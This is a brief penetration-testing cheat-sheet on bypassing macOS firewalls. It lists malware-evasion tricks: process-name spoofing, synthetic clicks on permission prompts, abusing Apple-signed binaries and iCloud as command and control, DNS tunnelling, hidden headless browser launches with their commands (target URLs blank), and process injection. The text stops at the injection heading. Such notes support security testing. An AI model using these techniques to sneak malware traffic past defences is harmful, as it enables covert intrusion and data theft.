macOS Bypassing Firewalls

Found techniques

The following techniques were found working in some macOS firewall apps.

Abusing whitelist names

  • For example calling the malware with names of well known macOS processes like launchd

Synthetic Click

  • If the firewall ask for permission to the user make the malware click on allow

Use Apple signed binaries

  • Like curl, but also others like whois

Well known apple domains

The firewall could be allowing connections to well known apple domains such as or And iCloud could be used as a C2.

Generic Bypass

Some ideas to try to bypass firewalls

Check allowed traffic

Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them

Abusing DNS

DNS resolutions are done via mdnsreponder signed application which will probably vi allowed to contact DNS servers.

Via Browser apps

  • oascript
tell application "Safari"
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "
end tell
  • Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless ""
  • Firefox
firefox-bin --headless ""
  • Safari
open -j -a Safari ""

Via processes injections

If you can inject code into a process that is allowed to connect to any server you could bypass the firewall protections: